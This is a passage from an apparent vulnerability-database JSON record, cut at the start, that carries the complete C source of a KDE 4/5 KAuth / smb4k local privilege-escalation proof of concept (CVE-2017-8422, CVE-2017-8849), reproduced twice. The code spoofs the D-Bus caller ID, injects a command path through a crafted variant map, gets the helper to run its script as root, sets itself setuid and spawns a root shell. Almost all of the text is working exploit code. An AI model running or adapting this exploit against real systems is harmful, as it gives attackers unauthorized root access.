x00,0x00,0x00,0x0a,0x00,0x6d,0x00,0x68,0x00,\"\r\n\"0x5f,0x00,0x69,0x00,0x70,0x00,0x00,0x00,0x0a,0x00,0xff,0xff,0xff,0xff,\"\r\n\"0x00,0x00,0x00,0x14,0x00,0x6d,0x00,0x68,0x00,0x5f,0x00,0x63,0x00,0x6f,\"\r\n\"0x00,0x6
d,0x00,0x6d,0x00,0x65,0x00,0x6e,0x00,0x74,0x00,0x00,0x00,0x0a,\"\r\n\"0x00,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x14,0x00,0x6d,0x00,0x68,0x00,\"\r\n\"0x5f,0x00,0x63,0x00,0x6f,0x00,0x6d,0x00,0x6d,0x00,0x61,0x00,0x6e,0x00,\"\r\n\"0x64,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,0x20,0x00,0x2f,0x00,0x74,\"\r\n\"0x00,0x6d,0x00,0x70,0x00,0x2f,0x00,0x78,0x00,0x6d,0x00,0x6f,0x00,0x75,\"\r\n\"0x00,0x6e,0x00,0x74,0x00,0x2e,0x00,0x63,0x00,0x69,0x00,0x66,0x00,0x73\",\r\n\r\n// the callerID, \":1.0\" which is dbus itself and thus always passes\r\n\"array:byte:58,49,46,48\", NULL};\r\n\r\n\tchar *boomsh = \"/tmp/xmount.cifs\";\r\n\tchar *const sh[] = {me, \"shell\", NULL};\r\n\tchar *const bash[] = {\"/bin/bash\", \"--norc\", \"--noprofile\", NULL};\r\n\tstruct stat st;\r\n\tint fd = -1;\r\n\r\n\tif (readlink(\"/proc/self/exe\", me, sizeof(me) - 1) < 0)\r\n\t\tdie(\"[-] readlink\");\r\n\r\n\tif (geteuid() == 0) {\r\n\t\tsetuid(0);\r\n\t\tsetgid(0);\r\n\t\tif (argc == 2) {\r\n\t\t\texecve(*bash, bash, NULL);\r\n\t\t\tdie(\"[-] execve of bash\");\r\n\t\t}\r\n\t\tchown(me, 0, 0);\r\n\t\tchmod(me, 04755);\r\n\t\texit(0);\r\n\t}\r\n\r\n\tprintf(\"[*] Creating shellscript ...\\n\");\r\n\tunlink(boomsh);\r\n\tif ((fd = open(boomsh, O_RDWR|O_CREAT, 0755)) < 0)\r\n\t\tdie(\"[-] open\");\r\n\twrite(fd, \"#!/bin/sh\\n\", 10);\r\n\twrite(fd, me, strlen(me));\r\n\twrite(fd, \"\\n\", 1);\r\n\tclose(fd);\r\n\r\n\tprintf(\"[*] Triggering call...\\n\");\r\n\r\n\tif (fork() == 0) {\r\n\t\texecve(*dbus, dbus, NULL);\r\n\t\texit(1);\r\n\t}\r\n\twait(NULL);\r\n\tsleep(5);\r\n\tprintf(\"[*] Trying to find rootshell...\\n\");\r\n\r\n\tmemset(&st, 0, sizeof(st));\r\n\tstat(me, &st);\r\n\tif ((st.st_mode & 04000) != 04000)\r\n\t\tdie(\"[-] Failed to chmod ourselfs.\\n\");\r\n\r\n\texecve(me, sh, NULL);\r\n\treturn 0;\r\n}\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42053/"}], "packetstorm": [{"lastseen": "2017-05-25T17:56:17", "description": "", 
"published": "2017-05-23T00:00:00", "type": "packetstorm", "title": "KDE 4/5 KAuth Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8422", "CVE-2017-8849"], "modified": "2017-05-23T00:00:00", "id": "PACKETSTORM:142638", "href": "https://packetstormsecurity.com/files/142638/KDE-4-5-KAuth-Privilege-Escalation.html", "sourceData": "`// cc -Wall smb0k.c -pedantic -std=c11 \n// \n// smb4k PoC, also demonstrating broader scope of a generic kde \n// authentication bypass vulnerability \n// \n// (C) 2017 Sebastian Krahmer \n// \n \n#define _POSIX_C_SOURCE 200112L \n#include <stdio.h> \n#include <fcntl.h> \n#include <unistd.h> \n#include <stdlib.h> \n#include <errno.h> \n#include <string.h> \n#include <sys/types.h> \n#include <sys/wait.h> \n#include <sys/stat.h> \n \n \nvoid die(const char *s) \n{ \nperror(s); \nexit(errno); \n} \n \n \nint main(int argc, char **argv) \n{ \nchar me[1024] = {0}; \nchar *dbus[] = { \n\"/usr/bin/dbus-send\", \n\"--system\", \n\"--print-reply\", \n\"--dest=net.sourceforge.smb4k.mounthelper\", \n\"/\", \n\"org.kde.auth.performActions\", \n\"array:byte:\" \n// The variant map, containing evil mh_command key-pair \n\"0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x4e,0x00,0x6e,0x00,0x65,0x00,0x74,\" \n\"0x00,0x2e,0x00,0x73,0x00,0x6f,0x00,0x75,0x00,0x72,0x00,0x63,0x00,0x65,\" \n\"0x00,0x66,0x00,0x6f,0x00,0x72,0x00,0x67,0x00,0x65,0x00,0x2e,0x00,0x73,\" \n\"0x00,0x6d,0x00,0x62,0x00,0x34,0x00,0x6b,0x00,0x2e,0x00,0x6d,0x00,0x6f,\" \n\"0x00,0x75,0x00,0x6e,0x00,0x74,0x00,0x68,0x00,0x65,0x00,0x6c,0x00,0x70,\" \n\"0x00,0x65,0x00,0x72,0x00,0x2e,0x00,0x6d,0x00,0x6f,0x00,0x75,0x00,0x6e,\" \n\"0x00,0x74,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x18,0x00,0x6d,0x00,0x68,\" \n\"0x00,0x5f,0x00,0x77,0x00,0x6f,0x00,0x72,0x00,0x6b,0x00,0x67,0x00,0x72,\" \n\"0x00,0x6f,0x00,0x75,0x00,0x70,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,\" \n\"0x00,0x00,0x00,0x00,0x0c,0x00,0x6d,0x00,0x68,0x00,0x5f,0x00,0x75,0x00,\" 
\n\"0x72,0x00,0x6c,0x00,0x00,0x00,0x11,0x00,0x00,0x00,0x00,0x24,0x73,0x6d,\" \n\"0x62,0x3a,0x2f,0x2f,0x61,0x62,0x63,0x3a,0x31,0x32,0x33,0x34,0x35,0x36,\" \n\"0x40,0x31,0x32,0x37,0x2e,0x30,0x2e,0x30,0x2e,0x31,0x3a,0x34,0x34,0x35,\" \n\"0x2f,0x73,0x68,0x61,0x72,0x65,0x00,0x00,0x00,0x0c,0x00,0x6d,0x00,0x68,\" \n\"0x00,0x5f,0x00,0x75,0x00,0x6e,0x00,0x63,0x00,0x00,0x00,0x0a,0x00,0x00,\" \n\"0x00,0x00,0x22,0x00,0x2f,0x00,0x2f,0x00,0x31,0x00,0x32,0x00,0x37,0x00,\" \n\"0x2e,0x00,0x30,0x00,0x2e,0x00,0x30,0x00,0x2e,0x00,0x31,0x00,0x2f,0x00,\" \n\"0x73,0x00,0x68,0x00,0x61,0x00,0x72,0x00,0x65,0x00,0x00,0x00,0x14,0x00,\" \n\"0x6d,0x00,0x68,0x00,0x5f,0x00,0x6f,0x00,0x70,0x00,0x74,0x00,0x69,0x00,\" \n\"0x6f,0x00,0x6e,0x00,0x73,0x00,0x00,0x00,0x0b,0x00,0x00,0x00,0x00,0x02,\" \n\"0x00,0x00,0x00,0x04,0x00,0x2d,0x00,0x6f,0x00,0x00,0x01,0x1c,0x00,0x75,\" \n\"0x00,0x73,0x00,0x65,0x00,0x72,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,\" \n\"0x00,0x3d,0x00,0x6a,0x00,0x6f,0x00,0x65,0x00,0x2c,0x00,0x75,0x00,0x69,\" \n\"0x00,0x64,0x00,0x3d,0x00,0x33,0x00,0x33,0x00,0x33,0x00,0x33,0x00,0x2c,\" \n\"0x00,0x67,0x00,0x69,0x00,0x64,0x00,0x3d,0x00,0x31,0x00,0x30,0x00,0x30,\" \n\"0x00,0x2c,0x00,0x70,0x00,0x6f,0x00,0x72,0x00,0x74,0x00,0x3d,0x00,0x34,\" \n\"0x00,0x34,0x00,0x35,0x00,0x2c,0x00,0x72,0x00,0x77,0x00,0x2c,0x00,0x66,\" \n\"0x00,0x69,0x00,0x6c,0x00,0x65,0x00,0x5f,0x00,0x6d,0x00,0x6f,0x00,0x64,\" \n\"0x00,0x65,0x00,0x3d,0x00,0x30,0x00,0x37,0x00,0x35,0x00,0x35,0x00,0x2c,\" \n\"0x00,0x64,0x00,0x69,0x00,0x72,0x00,0x5f,0x00,0x6d,0x00,0x6f,0x00,0x64,\" \n\"0x00,0x65,0x00,0x3d,0x00,0x30,0x00,0x37,0x00,0x35,0x00,0x35,0x00,0x2c,\" \n\"0x00,0x70,0x00,0x65,0x00,0x72,0x00,0x6d,0x00,0x2c,0x00,0x6e,0x00,0x6f,\" \n\"0x00,0x73,0x00,0x65,0x00,0x74,0x00,0x75,0x00,0x69,0x00,0x64,0x00,0x73,\" \n\"0x00,0x2c,0x00,0x6e,0x00,0x6f,0x00,0x73,0x00,0x65,0x00,0x72,0x00,0x76,\" \n\"0x00,0x65,0x00,0x72,0x00,0x69,0x00,0x6e,0x00,0x6f,0x00,0x2c,0x00,0x63,\" 
\n\"0x00,0x61,0x00,0x63,0x00,0x68,0x00,0x65,0x00,0x3d,0x00,0x73,0x00,0x74,\" \n\"0x00,0x72,0x00,0x69,0x00,0x63,0x00,0x74,0x00,0x2c,0x00,0x6e,0x00,0x6f,\" \n\"0x00,0x6d,0x00,0x61,0x00,0x70,0x00,0x63,0x00,0x68,0x00,0x61,0x00,0x72,\" \n\"0x00,0x73,0x00,0x2c,0x00,0x73,0x00,0x65,0x00,0x63,0x00,0x3d,0x00,0x6e,\" \n\"0x00,0x74,0x00,0x6c,0x00,0x6d,0x00,0x73,0x00,0x73,0x00,0x70,0x00,0x2c,\" \n\"0x00,0x76,0x00,0x65,0x00,0x72,0x00,0x73,0x00,0x3d,0x00,0x31,0x00,0x2e,\" \n\"0x00,0x30,0x00,0x00,0x00,0x1a,0x00,0x6d,0x00,0x68,0x00,0x5f,0x00,0x6d,\" \n\"0x00,0x6f,0x00,0x75,0x00,0x6e,0x00,0x74,0x00,0x70,0x00,0x6f,0x00,0x69,\" \n\"0x00,0x6e,0x00,0x74,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,0x3e,0x00,\" \n\"0x2f,0x00,0x68,0x00,0x6f,0x00,0x6d,0x00,0x65,0x00,0x2f,0x00,0x6a,0x00,\" \n\"0x6f,0x00,0x65,0x00,0x2f,0x00,0x73,0x00,0x6d,0x00,0x62,0x00,0x34,0x00,\" \n\"0x6b,0x00,0x2f,0x00,0x31,0x00,0x32,0x00,0x37,0x00,0x2e,0x00,0x30,0x00,\" \n\"0x2e,0x00,0x30,0x00,0x2e,0x00,0x31,0x00,0x2f,0x00,0x73,0x00,0x68,0x00,\" \n\"0x61,0x00,0x72,0x00,0x65,0x00,0x00,0x00,0x0a,0x00,0x6d,0x00,0x68,0x00,\" \n\"0x5f,0x00,0x69,0x00,0x70,0x00,0x00,0x00,0x0a,0x00,0xff,0xff,0xff,0xff,\" \n\"0x00,0x00,0x00,0x14,0x00,0x6d,0x00,0x68,0x00,0x5f,0x00,0x63,0x00,0x6f,\" \n\"0x00,0x6d,0x00,0x6d,0x00,0x65,0x00,0x6e,0x00,0x74,0x00,0x00,0x00,0x0a,\" \n\"0x00,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x14,0x00,0x6d,0x00,0x68,0x00,\" \n\"0x5f,0x00,0x63,0x00,0x6f,0x00,0x6d,0x00,0x6d,0x00,0x61,0x00,0x6e,0x00,\" \n\"0x64,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,0x20,0x00,0x2f,0x00,0x74,\" \n\"0x00,0x6d,0x00,0x70,0x00,0x2f,0x00,0x78,0x00,0x6d,0x00,0x6f,0x00,0x75,\" \n\"0x00,0x6e,0x00,0x74,0x00,0x2e,0x00,0x63,0x00,0x69,0x00,0x66,0x00,0x73\", \n \n// the callerID, \":1.0\" which is dbus itself and thus always passes \n\"array:byte:58,49,46,48\", NULL}; \n \nchar *boomsh = \"/tmp/xmount.cifs\"; \nchar *const sh[] = {me, \"shell\", NULL}; \nchar *const bash[] = {\"/bin/bash\", \"--norc\", \"--noprofile\", NULL}; \nstruct stat st; \nint fd = -1; 
\n \nif (readlink(\"/proc/self/exe\", me, sizeof(me) - 1) < 0) \ndie(\"[-] readlink\"); \n \nif (geteuid() == 0) { \nsetuid(0); \nsetgid(0); \nif (argc == 2) { \nexecve(*bash, bash, NULL); \ndie(\"[-] execve of bash\"); \n} \nchown(me, 0, 0); \nchmod(me, 04755); \nexit(0); \n} \n \nprintf(\"[*] Creating shellscript ...\\n\"); \nunlink(boomsh); \nif ((fd = open(boomsh, O_RDWR|O_CREAT, 0755)) < 0) \ndie(\"[-] open\"); \nwrite(fd, \"#!/bin/sh\\n\", 10); \nwrite(fd, me, strlen(me)); \nwrite(fd, \"\\n\", 1); \nclose(fd); \n \nprintf(\"[*] Triggering call...\\n\"); \n \nif (fork() == 0) { \nexecve(*dbus, dbus, NULL); \nexit(1); \n} \nwait(NULL); \nsleep(5); \nprintf(\"[*] Trying to find rootshell...\\n\"); \n \nmemset(&st, 0, sizeof(st)); \nstat(me, &st); \nif ((st.st_mode & 04000) != 04000) \ndie(\"[-] Failed to chmod ourselfs.\\n\"); \n \nexecve(me, sh, NULL); \nreturn 0; \n} \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/142638/kde45-escalate.txt"}]}